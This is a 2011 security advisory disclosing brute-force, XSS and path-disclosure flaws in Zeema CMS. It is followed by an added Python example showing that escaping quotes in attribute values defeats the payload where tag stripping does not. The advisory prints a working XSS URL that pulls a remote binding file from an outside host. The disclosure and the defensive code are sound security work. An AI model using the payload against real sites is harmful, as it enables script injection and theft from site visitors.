Zeema CMS Cross Site Scripting / Path Disclosure

2011-12-04T00:00:00
ID PACKETSTORM:107509
Type packetstorm
Reporter MustLive
Modified 2011-12-04T00:00:00

Description

                                        
Hello list!  
  
I want to warn you about Brute Force, Cross-Site Scripting and Full path  
disclosure vulnerabilities in Zeema CMS. It's a Ukrainian commercial CMS.  
  
-------------------------  
Affected products:  
-------------------------  
  
All versions of Zeema CMS are vulnerable.  
  
----------  
Details:  
----------  
  
Brute Force (WASC-11):  
  
http://site/cms/  
  
XSS (WASC-08):  
  
http://site/search/?query=%22%20style=%22-moz-binding:url(http://websecurity.com.ua/webtools/xss.xml%23xss)  
  
The attack will work in Mozilla and Firefox.  
  
Full path disclosure (WASC-13):  
  
http://site/search/?page=10&query=site  
  
------------  
Timeline:  
------------  
  
2011.09.12 - found the vulnerabilities during an audit. After that, the client  
informed the developers straight away.  
2011.10.22 - announced on my site.  
2011.10.23 - informed the developers.  
2011.12.02 - disclosed on my site.  
  
I mentioned these vulnerabilities on my site  
(http://websecurity.com.ua/5459/).  
  
Best wishes & regards,  
MustLive  
Administrator of Websecurity web site  
http://websecurity.com.ua  
  
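Added example, not part of the original advisory and not Zeema CMS code: the XSS query string above contains no angle brackets, so a filter that only strips tags does not stop it, while attribute-context encoding does. The `<input>` template and all function names are assumptions for illustration; the advisory does not show where the search page reflects `query`.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import unquote

# Query value from the advisory's XSS URL, decoded as a server would see it.
PAYLOAD = unquote("%22%20style=%22-moz-binding:url("
                  "http://websecurity.com.ua/webtools/xss.xml%23xss)")
# Assumed template: the search box echoes the query in a quoted attribute.
TEMPLATE = '<input type="text" name="query" value="%s">'


def render_unsafe(query):
    """Vulnerable pattern: raw value interpolated into the attribute."""
    return TEMPLATE % query


def render_tag_filter(query):
    """Incomplete fix: stripping angle brackets leaves the quote intact."""
    return TEMPLATE % query.replace("<", "").replace(">", "")


def render_escaped(query):
    """Attribute-context encoding of &, <, > and both quote characters."""
    return TEMPLATE % escape(query, quote=True)


class _InputAttrs(HTMLParser):
    """Records the attributes of the first <input> start tag."""

    def __init__(self):
        super().__init__()
        self.attrs = None

    def handle_starttag(self, tag, attrs):
        if tag == "input" and self.attrs is None:
            self.attrs = dict(attrs)


def input_attributes(markup):
    """Parse markup and return the <input> element's attributes."""
    parser = _InputAttrs()
    parser.feed(markup)
    parser.close()
    return parser.attrs


if __name__ == "__main__":
    for render in (render_unsafe, render_tag_filter, render_escaped):
        print(render.__name__, sorted(input_attributes(render(PAYLOAD))))
```

Parsing the rendered markup and asserting on the resulting attribute set works as a regression check: only the escaped rendering leaves the element without an injected `style` attribute.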